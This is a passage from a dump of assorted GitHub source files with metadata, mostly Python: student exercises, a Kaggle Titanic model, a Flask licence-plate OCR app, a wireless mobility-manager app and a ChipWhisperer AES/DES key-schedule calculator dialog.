y se imprime\r\n currentTime=time.time()\r\n\r\n fsp= 1/(currentTime-previousTime)\r\n\r\n previousTime= currentTime\r\n\r\n cv2.putText(imagencamara, str(int(fsp)),(10,78), cv2.FONT_HERSHEY_COMPLEX, 2, (255,0,255),3)\r\n # se muestra la imagen con los datos\r\n cv2.imshow(\"imagen\", imagencamara)\r\n # se espera a cancelar con una tecla o Ctrl + C en consola\r\n cv2.waitKey(1)","repo_name":"jlamprea/opencv_mediapipe_manos","sub_path":"myplayhands.py","file_name":"myplayhands.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37421538274","text":"# create list\nlist1 = [0]\nlist2 = [0]\n# put new numbers to 
list\n'''\nappend appends an object \nextend extends a list by appending elements \n'''\nlist1.append([1,2,3])\nlist2.extend([1,2,3])\n\nlist1.remove([1,2,3])\n\nrlist = list1\nclist = rlist.copy()\nclist.insert(0,-3)\nclist.insert(0,-2)\nclist.insert(0,-3)\n\n# remove 0 from clist\nclist.pop(clist.index(0))\n\nprint(list1, list2, rlist, clist, sep= '\\n')\n\n# by clearing original list the copy will be cleared too\nlist1.clear()\nprint(list1, list2, rlist, clist, sep= '\\n')","repo_name":"Meschr/PythonAufgaben","sub_path":"Uebung2/Aufgabe_03c.py","file_name":"Aufgabe_03c.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23813737562","text":"def sort_out_clicks(list_of_numbers):\n index = 0\n lenght = len(list_of_numbers)\n grouped_clicks = []\n # we define our starting index, while base case and we initiate a lits we gonna use later #\n # to append all the grouped clicks#\n while index < lenght:\n # use the algorith from a previous exercise where we start to iterate though our list #\n # of clicks with a while loop. We set a item we gonna use for initial comparison #\n # we defince a look ahead index for comparison #\n current_digit = list_of_numbers[index]\n look_ahead = index + 1\n current_group = [current_digit]\n while look_ahead < lenght and current_digit == list_of_numbers[look_ahead]:\n # inner loop thats gonna separte our clicks #\n current_group.append(current_digit)\n look_ahead += 1\n grouped_clicks.append(current_group)\n index = look_ahead\n return grouped_clicks\n\n\nsymbols_dict = {\n 2: 'abc',\n 3: 'def',\n 4: 'ghi',\n 5: 'jkl',\n 6: 'mno',\n 7: 'pqrs',\n 8: 'tuv',\n 9: 'wxyz'\n}\n# a dictionary that imitates the buttons of a retro cell #\ndef right_length(index, lenght):\n return index < lenght\n\ndef numbers_to_message(pressed_sequence):\n sorted_clicks = sort_out_clicks(pressed_sequence)\n word = []\n capital = False\n # we initiate a boolen for the digit 1 case which capitalizes the next letter in our message #\n for item in sorted_clicks:\n button = item[0]\n if button == 1:\n # when we must capitalize next#\n capital = True\n continue\n if button == 0:\n # when we must add an interval to the message #\n word.append(' ')\n continue\n if button == -1:\n # just skip #\n continue\n length = len(symbols_dict[button])\n if not item.count(button) == 1:\n index = (item.count(button) - 1) % length\n # we use modul to ensure we get a symbol even when the clicks exceed the len of the value#\n else:\n index = item.count(button) - 1\n # corner case where the modulo wont work #\n if capital:\n # the case where we must capitalise #\n symbol = symbols_dict[button][index].upper()\n capital = False\n\n\n else:\n symbol = symbols_dict[button][index]\n # we append the symbol to the list #\n word.append(symbol)\n # we return the joined message #\n return ''.join(word)\n\ntests = [\n ([2, -1, 2, 2, -1, 2, 2, 2], \"abc\"),\n ([2, 2, 2, 2], \"a\"),\n ([1, 4, 4, 4, 8, 8, 8, 6, 6, 6, 0, 3, 3, 0, 1, 7, 7, 7, 7, 7, 2, 6, 6, 3, 2], \"Ivo e Panda\")\n]\n\nfor test, expected in tests:\n print(expected == numbers_to_message(test))\n\n\n\n\n\n\n","repo_name":"antonko-de/HackBulgaria-Python-101-Forever","sub_path":"C01/C01P16S01.py","file_name":"C01P16S01.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71541956321","text":"import numpy as np\n\nfrom collections import defaultdict\nimport 
pandas as pd\nfrom discrete_batch_bandits import bkcub_experiment, sbpe_experiment\n\nlambdas = [1e0, 1e1, 1e2]\n\ndef bkucb_experiments(dataset_name, lambda_grid):\n\n loss_std = 0\n best_loss = np.inf\n print('-' * 80)\n print('BKCUB experiment, dataset {}'.format(dataset_name))\n\n for lbd in lambda_grid:\n print('-' * 80)\n print('Lambda {}'.format(lbd))\n\n seeds_losses = []\n\n\n for random_seed in range(10):\n # a posteriori selection\n print('-' * 80)\n print('Seed {}'.format(random_seed))\n rollout_losses = bkcub_experiment(dataset_name, lbd, random_seed)\n\n final_loss = np.squeeze(rollout_losses)[-1]\n seeds_losses.append(final_loss)\n\n lbd_loss = np.mean(seeds_losses)\n\n if lbd_loss < best_loss:\n best_loss = lbd_loss\n loss_std = np.std(seeds_losses)\n\n return best_loss, loss_std\n\n\ndef sbpe_experiments(dataset_name):\n seeds_losses = []\n\n print('-' * 80)\n print('SBPE experiment, dataset {}'.format(dataset_name))\n\n for random_seed in range(10):\n print('-' * 80)\n print('Seed {}'.format(random_seed))\n # a posteriori selection\n rollout_losses = sbpe_experiment(dataset_name, random_seed)\n\n final_loss = np.squeeze(rollout_losses)[-1]\n seeds_losses.append(final_loss)\n\n loss = np.mean(seeds_losses)\n loss_std = np.std(seeds_losses)\n\n return loss, loss_std\n\nif __name__ == '__main__':\n results = defaultdict(list)\n\n\n\n dataset_name = 'yeast'\n # Report performances\n\n sbpe_perf, sbpe_std = sbpe_experiments(dataset_name)\n bkucb_perf, bkucb_std = bkucb_experiments(dataset_name, lambdas)\n\n results['dataset'] += [dataset_name]\n\n results['BKUCB'] += ['$%.3f \\pm %.3f$' % (bkucb_perf, bkucb_std)]\n results['SBPE'] += ['$%.3f \\pm %.3f$' % (sbpe_perf, sbpe_std)]\n\n df = pd.DataFrame(data=results)\n df.to_latex(\n 'batch_bandit_results.tex', index=False, column_format='r', escape=False\n )\n\n print('-' * 80)\n print(df)\n print('-' * 80)\n\n dataset_name = 'scene'\n # Report performances\n bkucb_perf, bkucb_std = bkucb_experiments(dataset_name, lambdas)\n sbpe_perf, sbpe_std = sbpe_experiments(dataset_name)\n\n\n results['dataset'] += [dataset_name]\n\n results['BKUCB'] += ['$%.3f \\pm %.3f$' % (bkucb_perf, bkucb_std)]\n results['SBPE'] += ['$%.3f \\pm %.3f$' % (sbpe_perf, sbpe_std)]\n\n df = pd.DataFrame(data=results)\n df.to_latex(\n 'batch_bandit_results.tex', index=False, column_format='r', escape=False\n )\n\n print('-' * 80)\n print(df)\n print('-' * 80)\n\n\n\n","repo_name":"criteo-research/sequential-conterfactual-risk-minimization","sub_path":"batch_bandit_experiments.py","file_name":"batch_bandit_experiments.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"6146920334","text":"\"\"\"\n====================================================================================\nТеория(посмотреть https://russianblogs.com/article/23801660249/):\nАвл-дерево - двоичное дерево.\nДерево-поиска - слева всегда наименьший эелемент, справа всегда наибольший.\nВысота поддерева - максимальное количесво взаимосвязанных элементов в данном дереве.\nБаланс - левая_высоста-правая_высота выбранного узла.\n====================================================================================\nМалый правый поворот:\n1.когда баланс корня = +2(точно есть ребенок)\n2.когда баланс ребенка = +1\n 1)меняем местами родителя и ребенка( передаём правую/левую ветку приобмене)\nБольшой правый п��ворот:\n1.когда баланс ребенка = -1\n\"\"\"\n\n\"\"\"\nЗа основу взят пакет - treelib 
(https://treelib.readthedocs.io/en/latest/). \nВелосипедный код - плохо (ничтожный, хоть и новый, деревянный велосипед никому не нужен),\nпоэтому взятие чужого кода - хорошая и полезная практика для любого программиста. На что способен это пакет:\n 1.Создание деревьев\n 2.Добавление нового элемента с помощью метода create_node(\"значение узла\", \"идентификатор\", \"родитель\")\n 3.Красивое отображение в консоли с помощью метода show\n 4.Удаление узла с помощью remove_node(\"идентификатор\")\n\"\"\"\n\nfrom treelib import Tree, Node\n\n\n# нереализованный\nclass MyNode(Node):\n def __init__(self, tag, identifier, data=None, parent=None, left=None, right=None):\n self.left = left\n self.right = right\n self.data = tag\n args = [arg for arg in [tag, identifier, data] if arg != None]\n super(MyNode, self).__init__(*args)\n\n\n# возвращает тестовое дерево\ndef test_tree() -> Tree:\n tree = Tree()\n data = [\n {\"tag\": 1, \"identifier\": 1, \"parent\": None},\n {\"tag\": 2, \"identifier\": 2, \"parent\": 1},\n {\"tag\": 3, \"identifier\": 3, \"parent\": 1},\n {\"tag\": 4, \"identifier\": 4, \"parent\": 3},\n {\"tag\": 5, \"identifier\": 5, \"parent\": 3},\n {\"tag\": 6, \"identifier\": 6, \"parent\": 2}\n ]\n for node in data:\n tree.create_node(tag=node[\"tag\"], identifier=node[\"identifier\"], parent=node[\"parent\"])\n return tree\n\n\n\"\"\"\nПОВОРОТ НА ПРАВА\n\ndef right_rotate(self, node):\n if not node or not node.left:\n raise AssertionError(\n \" right rotate to illegal node \" + str(node))\n\n parent_node = node.parent\n node_left = node.left\n node.left = node_left.right\n\n if node.left:\n node.left.parent = node\n node_left.right = node\n node.parent = node_left\n if parent_node:\n if node == parent_node.left:\n parent_node.left = node_left\n else:\n parent_node.right = node_left\n node_left.parent = parent_node\n else:\n self.root = node_left\n node_left.parent = None\"\"\"\n\ntree = test_tree()\ntree.show()\ntext = tree.subtree(3)\nprint(type(text))\n","repo_name":"TimurStorm/AVL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28933988336","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def middleNode(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n\n val_list = [head.val]\n node = head\n node_count = 1\n\n while node.next:\n node = node.next\n val_list.append(node.val)\n node_count += 1\n\n return val_list[int(node_count / 2):]\n","repo_name":"kkxujq/leetcode","sub_path":"answer/0876/876.linningmii.py","file_name":"876.linningmii.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"2641309701","text":"import csv as csv\nimport numpy as np\nfrom random import uniform\nimport math\nimport pandas as pd\n\ndata = pd.read_csv('./csv/train.csv')\n\nfare_ceiling = 40\n# then modify the data in the Fare column to = 39, if it is greater or equal to the ceiling\ndata[ data.Fare >= fare_ceiling] = fare_ceiling - 1.0\ndata['Gender']=df.Sex.map({'female':0,'male':1})\nfare_bucket = 10\n\n# Fill the missing ages\nage_median = {}\nfor i in range (0, 2):\n for j in range (1,4):\n age_median[(i+j*3)] = data[(data['Gender'] == i) & (data['Pclass'] == j)].Age.median()\ndata['AgeNew'] = data.apply(lambda x: 
age_median.get(x.Gender + 3*x.Pclass) if math.isnan(x.Age) else x.Age, axis=1)\n\nsurvive = {}\n\nfor i in xrange(3):\n for j in xrange(4):\n for k in xrange(5):\n female = data[(data.Gender==0) & (data.Pclass==(i+1)) \\\n & (data.Fare>=j*fare_bucket) & (data.Fare < (j+1)*fare_bucket)\\\n & (data.AgeNew>(k*20)) & (data.AgeNew<=((k+1)*20))]\n key = 0 + 10*i + 100*j + 1000*k\n survive[key] = female.Survived.mean();\n \n male = data[(data.Gender==1) & (data.Pclass==(i+1)) \\\n & (data.Fare>=j*fare_bucket) & (data.Fare < (j+1)*fare_bucket)\\\n & (data.AgeNew>(k*20)) & (data.AgeNew<=((k+1)*20))]\n key = 1 + 10*i + 100*j + 1000*k\n survive[key] = male.Survived.mean();\n\ntest_file = open('./csv/test.csv', 'rb')\ntest_file_object = csv.reader(test_file)\nheader = test_file_object.next()\n\nprediction_file = open(\"genderbasedmodel.csv\", \"wb\")\nprediction_file_object = csv.writer(prediction_file)\nprediction_file_object.writerow([\"PassengerId\", \"Survived\"])\n\n\n\nfor row in test_file_object: # For each row in test.csv\n i = 0 if row[3] == 'female' else 1\n j = int(row[1]) - 1\n #print row[0], row[8]\n k = 0 if not row[8] else float(row[8]) // 10\n k = k if k <=3 else 3\n l = 4 if not row[4] else float(row[4]) // 20\n p = survive.get(i + 10*j + 100*k + 1000*l)\n \n if round(uniform(0,1),2) < p:\n prediction_file_object.writerow([row[0],'1']) # predict 1\n else:\n prediction_file_object.writerow([row[0],'0']) # predict 0\n \ntest_file.close()\nprediction_file.close()\n\n","repo_name":"azelman/HeatMap","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25049413269","text":"from wsgiref.util import request_uri\nfrom flask import Flask, render_template, request\n \nimport os \nfrom deeplearning1 import OCR\nfrom deeplearning import OCR_resnet\nfrom deeplearningdif import OCR_dif\nfrom yolo_real import yolo_real_time\nfrom youtube import yolo_real_time_youtube\n\napp = Flask(__name__)\n\nBASE_PATH = os.getcwd()\nUPLOAD_PATH = os.path.join(BASE_PATH,'static/upload/')\n\n\n@app.route('/',methods=['POST','GET'])\ndef index():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR(path_save,filename)\n\n return render_template('index.html',upload=True,upload_image=filename,text=text)\n\n return render_template('index.html',upload=False)\n\n@app.route('/yolo',methods=['POST','GET'])\ndef yolo():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n yolo_real_time(path_save,filename)\n\n return render_template('yolo.html',upload=True,upload_image=filename)\n\n return render_template('yolo.html',upload=False)\n\n@app.route('/resnet',methods=['POST','GET'])\ndef resnet():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR_resnet(path_save,filename)\n\n return render_template('resnet.html',upload=True,upload_image=filename,text=text)\n\n return render_template('resnet.html',upload=False)\n\n@app.route('/resnet_dif',methods=['POST','GET'])\ndef resnet_dif():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n 
filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR_dif(path_save,filename)\n\n return render_template('resnet_dif.html',upload=True,upload_image=filename,text=text)\n\n return render_template('resnet_dif.html',upload=False)\n\n\n\nif __name__ ==\"__main__\":\n app.run(debug=True)","repo_name":"omeryildizce/Arac-Plaka-Takip-Projesi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32181334822","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**5)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\ncount = 0\nT = int(input())\n\n\n\ndef dfs(x,y) :\n if x<0 or y<0 or x>=N or y>=M :\n return False\n if board[x][y] == 1 :\n board[x][y] = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n dfs(nx,ny)\n return True\n return False\n\n\n\nfor i in range(T) :\n result =0\n M,N,K= map(int,input().split())\n board = [[0 for i in range(M)] for j in range(N)]\n for j in range(K) :\n a, b = map(int,input().split())\n board[b][a] =1\n\n for i in range(N):\n for j in range(M) :\n if dfs(i,j) == True :\n result +=1\n print(result,end='\\n')\n","repo_name":"Dongdongbro/Algorithm","sub_path":"week03/DFS 유기농배추.py","file_name":"DFS 유기농배추.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40975569031","text":"from empower.core.app import EmpowerApp\nfrom empower.core.app import DEFAULT_PERIOD\n\nfrom empower.datatypes.etheraddress import EtherAddress\nfrom empower.core.resourcepool import ResourcePool\n\n\nDEFAULT_LIMIT = -10\n\n\nclass MobilityManager(EmpowerApp):\n \"\"\"Basic mobility manager.\n\n Command Line Parameters:\n\n period: loop period in ms (optional, default 5000ms)\n\n Example:\n\n ID=\"52313ecb-9d00-4b7d-b873-b55d3d9ada26\"\n ./empower-runtime.py apps.mobilitymanager.mobilitymanager:$ID\n\n \"\"\"\n\n def __init__(self, **kwargs):\n self.__limit = DEFAULT_LIMIT\n EmpowerApp.__init__(self, **kwargs)\n\n # Register an wtp up event\n self.wtpup(callback=self.wtp_up_callback)\n\n # Register an lvap join event\n self.lvapjoin(callback=self.lvap_join_callback)\n\n def lvap_join_callback(self, lvap):\n \"\"\"Called when a new LVAP connects the network.\"\"\"\n\n lvap.rssi(relation='LT', value=self.limit, callback=self.low_rssi)\n\n def handover(self, lvap):\n \"\"\" Handover the LVAP to a WTP with\n an RSSI higher that -65dB. 
\"\"\"\n\n self.log.info(\"Running handover...\")\n\n # Initialize the Resource Pool\n pool = ResourcePool()\n\n # Update the Resource Pool with all\n # the available Resourse Blocks\n for wtp in self.wtps():\n pool = pool | wtp.supports\n\n # Select matching Resource Blocks\n matches = pool & lvap.scheduled_on\n\n # Filter Resource Blocks by RSSI\n valid = [block for block in matches\n if block.ucqm[lvap.addr]['ewma_rssi'] >= -85]\n\n if not valid:\n return\n\n new_block = max(valid, key=lambda x: x.ucqm[lvap.addr]['ewma_rssi'])\n self.log.info(\"LVAP %s setting new block %s\" % (lvap.addr, new_block))\n\n lvap.scheduled_on = new_block\n\n # Set port\n for block in lvap.scheduled_on:\n port = lvap.scheduled_on[block]\n port.no_ack = True\n port.rts_cts = 3500\n port.mcs = [6, 12, 54]\n\n @property\n def limit(self):\n \"\"\"Return loop period.\"\"\"\n\n return self.__limit\n\n @limit.setter\n def limit(self, value):\n \"\"\"Set limit.\"\"\"\n\n limit = int(value)\n\n if limit > 0 or limit < -100:\n raise ValueError(\"Invalid value for limit\")\n\n self.log.info(\"Setting limit %u dB\" % value)\n self.__limit = limit\n\n def wtp_up_callback(self, wtp):\n \"\"\"Called when a new WTP connects to the controller.\"\"\"\n\n for block in wtp.supports:\n self.ucqm(block=block, every=self.every)\n\n def low_rssi(self, trigger):\n \"\"\" Perform handover if an LVAP's rssi is\n going below the threshold. \"\"\"\n\n lvap_addr = EtherAddress(trigger.events[-1]['lvap'])\n lvap = self.lvap(lvap_addr)\n\n self.handover(lvap)\n\n def loop(self):\n \"\"\" Periodic job. \"\"\"\n\n # Handover every active LVAP to\n # the best WTP\n for lvap in self.lvaps():\n self.handover(lvap)\n\n\ndef launch(tenant_id, limit=DEFAULT_LIMIT, every=DEFAULT_PERIOD):\n \"\"\" Initialize the module. \"\"\"\n\n return MobilityManager(tenant_id=tenant_id, limit=limit, every=every)\n","repo_name":"herlesupreeth/Empcontroller","sub_path":"empower/apps/mobilitymanager/mobilitymanager.py","file_name":"mobilitymanager.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26086561595","text":"from PySide.QtGui import *\nimport chipwhisperer.common.utils.qt_tweaks as QtFixes\nfrom chipwhisperer.common.utils import util\nfrom chipwhisperer.analyzer.attacks.models.AES128_8bit import AES128_8bit\nfrom chipwhisperer.analyzer.attacks.models.DES import DES\n\n\nclass AesKeyScheduleDialog(QtFixes.QDialog):\n\n def __init__(self, parent=None):\n super(AesKeyScheduleDialog, self).__init__(parent)\n self.model = AES128_8bit()\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.outmode = QComboBox()\n self.outmode.addItem(\"AABBCC...EEFF\", [\"\", \"\"])\n self.outmode.addItem(\"AA:BB:CC...EE:FF\", [\"\", \":\"])\n self.outmode.addItem(\"AA BB CC...EE FF\", [\"\", \" \"])\n self.outmode.addItem(\"AA,BB,CC...EE,FF\", [\"\", \",\"])\n self.outmode.addItem(\"0xAA, 0xBB, 0xCC... 
0xEE, 0xFF\", [\"0x\", \", \"])\n self.outmode.currentIndexChanged.connect(self.inTextChanged)\n\n self.indata = QtFixes.QLineEdit(\"\")\n self.indata.setFont(QFont(\"Courier\"))\n\n self.keysched = QTextEdit(\"\")\n self.keysched.setFont(QFont(\"Courier\"))\n\n self.outkey = QtFixes.QLineEdit(\"\")\n self.outkey.setReadOnly(True)\n self.outkey.setFont(QFont(\"Courier\"))\n\n outmodeL = QHBoxLayout()\n outmodeL.addWidget(QLabel(\"Format:\"))\n outmodeL.addWidget(self.outmode)\n outmodeL.addStretch()\n\n self.inprnd = QComboBox()\n self.inprnd.currentIndexChanged.connect(self.inTextChanged)\n self.setKeyLength(128)\n\n indataL = QHBoxLayout()\n indataL.addWidget(QLabel(\"Key:\"))\n indataL.addWidget(self.indata)\n indataL.addWidget(self.inprnd)\n self.indata.textChanged.connect(self.inTextChanged)\n\n outdataL = QHBoxLayout()\n outdataL.addWidget(QLabel(\"Key:\"))\n outdataL.addWidget(self.outkey)\n\n gbIndata = QGroupBox(\"Input Known Key\")\n gbIndata.setLayout(indataL)\n layout.addWidget(gbIndata)\n\n gbOutdata = QGroupBox(\"Output Desired Key\")\n outdataTotalL = QVBoxLayout()\n outdataTotalL.addLayout(outmodeL)\n outdataTotalL.addLayout(outdataL)\n gbOutdata.setLayout(outdataTotalL)\n layout.addWidget(gbOutdata)\n\n gbKeySched = QGroupBox(\"Full Key Schedule\")\n keyschedL = QVBoxLayout()\n keyschedL.addWidget(self.keysched)\n gbKeySched.setLayout(keyschedL)\n\n layout.addWidget(gbKeySched)\n\n self.setWindowTitle(\"AES-128/AES-256 Key Schedule Calculator\")\n self.setObjectName(\"AES Key Schedule\")\n self.setWindowIcon(QIcon(\":/images/cwiconA.png\"))\n self.setMinimumSize(800,400)\n\n def aesmodeChanged(self, indx):\n self.setKeyLength(self.aesmode.itemData(indx))\n\n def setKeyLength(self, klen):\n pi = self.inprnd.currentIndex()\n self.inprnd.blockSignals(True)\n if klen == 128:\n self.inprnd.clear()\n self.inprnd.addItem(\"0 (Initial Enc.)\", 0)\n self.inprnd.addItem(\"1 (2nd-Round Enc.)\", 1)\n self.inprnd.addItem(\"10 (Initial Dec.)\", 10)\n elif klen == 256:\n self.inprnd.clear()\n self.inprnd.addItem(\"0/1 (Initial Enc.)\", 0)\n self.inprnd.addItem(\"13/14 (Initial Dec.)\", 13)\n else:\n raise ValueError(\"Invalid keylength: %d\" % klen)\n\n if pi > -1:\n self.inprnd.setCurrentIndex(pi)\n self.inprnd.blockSignals(False)\n\n def inTextChanged(self, data=None):\n data = self.indata.text()\n try:\n newdata = util.hexstr2list(data)\n\n if len(newdata) != 16 and len(newdata) != 32:\n err = \"ERR: Len=%d: %s\" % (len(newdata), newdata)\n self.outkey.setText(err)\n self.keysched.setText(err)\n else:\n if len(newdata) == 16:\n self.setKeyLength(128)\n elif len(newdata) == 32:\n self.setKeyLength(256)\n\n #Read settings\n delim = self.outmode.itemData(self.outmode.currentIndex())\n desired = 0\n inpround = self.inprnd.itemData(self.inprnd.currentIndex())\n\n key = newdata\n\n # Get initial key\n result = self.model.keyScheduleRounds(key, inpround, desired)\n if len(key) == 32:\n result.extend(self.model.keyScheduleRounds(key, inpround, desired + 1))\n\n rstr = [\"%02x\" % t for t in result]\n rstr = (delim[1] + delim[0]).join(rstr)\n rstr = delim[0] + rstr\n\n self.outkey.setText(rstr)\n\n # Get entire key schedule\n if len(key) == 16:\n rnds = 10\n elif len(key) == 32:\n rnds = 14\n\n totalrndstr = ''\n for r in range(0, rnds+1):\n result = self.model.keyScheduleRounds(key, inpround, r)\n str = [\"%02x\" % t for t in result]\n str = (delim[1] + delim[0]).join(str)\n str = delim[0] + str\n totalrndstr += \"%2d: \" % r\n totalrndstr += str + \"\\n\"\n\n 
self.keysched.setText(totalrndstr)\n\n except ValueError:\n self.outkey.setText(\"ERR in HEX: %s\" % data)\n\n\nclass DesKeyScheduleDialog(QtFixes.QDialog):\n\n def __init__(self, parent=None):\n super(DesKeyScheduleDialog, self).__init__(parent)\n self.model = DES()\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.indata = QtFixes.QLineEdit(\"\")\n self.indata.setFont(QFont(\"Courier\"))\n\n self.keysched = QTextEdit(\"\")\n self.keysched.setFont(QFont(\"Courier\"))\n\n self.inprnd = QComboBox()\n self.inprnd.currentIndexChanged.connect(self.inTextChanged)\n\n indataL = QHBoxLayout()\n indataL.addWidget(QLabel(\"Key:\"))\n indataL.addWidget(self.indata)\n indataL.addWidget(QLabel(\"Round:\"))\n indataL.addWidget(self.inprnd)\n self.indata.textChanged.connect(self.inTextChanged)\n\n gbIndata = QGroupBox(\"Round Key/Subkey\")\n gbIndata.setLayout(indataL)\n layout.addWidget(gbIndata)\n\n gbKeySched = QGroupBox(\"Full Key Schedule\")\n keyschedL = QVBoxLayout()\n keyschedL.addWidget(self.keysched)\n keyschedL.addWidget(QLabel(\"X - Parity bits (not used); ? - Unknown/lost bits (could not be recovered)\"))\n gbKeySched.setLayout(keyschedL)\n\n layout.addWidget(gbKeySched)\n\n self.setWindowTitle(\"DES Key Schedule Calculator\")\n self.setObjectName(\"DES Key Schedule\")\n self.refreshRoundKeysLength()\n self.setMinimumSize(800,400)\n\n def refreshRoundKeysLength(self):\n self.inprnd.blockSignals(True)\n self.inprnd.clear()\n for n in range(self.model.getNumRoundKeys()+1):\n self.inprnd.addItem(str(n), n)\n self.inprnd.setCurrentIndex(0)\n self.inprnd.blockSignals(False)\n\n def inTextChanged(self, _=None):\n try:\n key = util.hexstr2list(self.indata.text())\n key = [int(d) for d in key]\n\n #Read settings\n inpround = self.inprnd.itemData(self.inprnd.currentIndex())\n\n # Get entire key schedule\n totalrndstr = \"\"\n roundKeys = self.model.getRoundKeys(key, inpround)\n for i, key in enumerate(roundKeys):\n totalrndstr += \"%2d: \" % i\n for j, bit in enumerate(key):\n if bit is not None:\n totalrndstr += str(bit)\n elif i == 0 and j % 8 == 7:\n totalrndstr += 'X'\n else:\n totalrndstr += '?'\n totalrndstr += \"\\n\"\n\n self.keysched.setText(totalrndstr)\n\n except:\n self.keysched.clear()\n","repo_name":"acaldaya/chipwhisperer","sub_path":"software/chipwhisperer/common/ui/KeyScheduleDialog.py","file_name":"KeyScheduleDialog.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33239927893","text":"# Write a program that counts the number of occurances of word in a sentence entered by user without using built in function.\n\ncount = 0\nsentence = input(\"Enter a sentence: \")\nprint(sentence)\nlist_word = input(\"Wanted word: \")\nprint(list_word)\n\nfor i in range(len(sentence)-len(list_word)+1):\n if sentence[i: i+len(list_word)] == list_word:\n count += 1\n print(list_word)\nprint(count)\n\n\n'''\nAnother way\nsentence = input(\"Please enter a sentence\\n\")\nlist_of_word = sentence.split()\n\nfor word in list_of_word:\n cnt = list_of_word.count(word)\n print(word, \" \", cnt)\n'''","repo_name":"rashmi-fit/coder","sub_path":"pythonBasics/exercise4_listOperation.py","file_name":"exercise4_listOperation.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4628159910","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nfrom 
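The KeyScheduleDialog record above formats round keys by prefixing every byte and joining with separator + prefix, which is what produces strings like 0xaa, 0xbb, 0xcc from the (prefix, separator) pairs registered on the output combo box. A small standalone check of that formatting logic:

def format_key(key_bytes, prefix, separator):
    # Same idea as the dialog: prefix each byte, join with the chosen separator.
    parts = ["%02x" % b for b in key_bytes]
    return prefix + (separator + prefix).join(parts)

assert format_key([0xAA, 0xBB, 0xCC], "", "") == "aabbcc"
assert format_key([0xAA, 0xBB, 0xCC], "", ":") == "aa:bb:cc"
assert format_key([0xAA, 0xBB, 0xCC], "0x", ", ") == "0xaa, 0xbb, 0xcc"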
sklearn.neighbors.kde import KernelDensity\n\n# extracting data from the csv file\ndf = pd.read_csv('hw04_data_set.csv', usecols=[\"x\", \"y\"])\n\nX = np.array(df[\"x\"])\nY = np.array(df[\"y\"])\n\n# dividing the data set into two parts by assigning the first 100 data points to the training set and the remaining\n# 33 data points to the test set.\nX_train = X[0:100]\nX_test = X[100:133]\n\nY_train = Y[0:100]\nY_test = Y[100:133]\n\n# setting constants\nN_train = len(X_train)\nN_test = len(X_test)\nminimum_value = 0\nmaximum_value = 60\nbin_width = 3\ndata_interval = np.linspace(minimum_value, maximum_value, 1201)\n\nleft_borders = np.arange(minimum_value, maximum_value, bin_width)\nright_borders = np.arange(minimum_value + bin_width, maximum_value + bin_width, bin_width)\n\n\n# REGRESSOGRAM\n# function for getting probability of each data in data set based on and comparing the training data set with given\n# binwidth\ndef get_p_hat(data_set):\n p_hat = []\n for i in range(len(left_borders)):\n current_sum = 0\n cnt = 0\n for j in range(len(data_set)):\n if left_borders[i] < data_set[j] <= right_borders[i]:\n current_sum += Y_train[j]\n cnt += 1\n if current_sum == 0:\n p_hat.append(0)\n else:\n p_hat.append(round(current_sum / cnt, 4))\n return p_hat\n\n\n# using the function above y_hat values are generated based on X_train\ny_hat = get_p_hat(X_train)\n\n# drawing training data points, test data points, and regressogram in the same figure with bin width 3\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nfor b in range(len(left_borders)):\n plt.plot([left_borders[b], right_borders[b]], [y_hat[b], 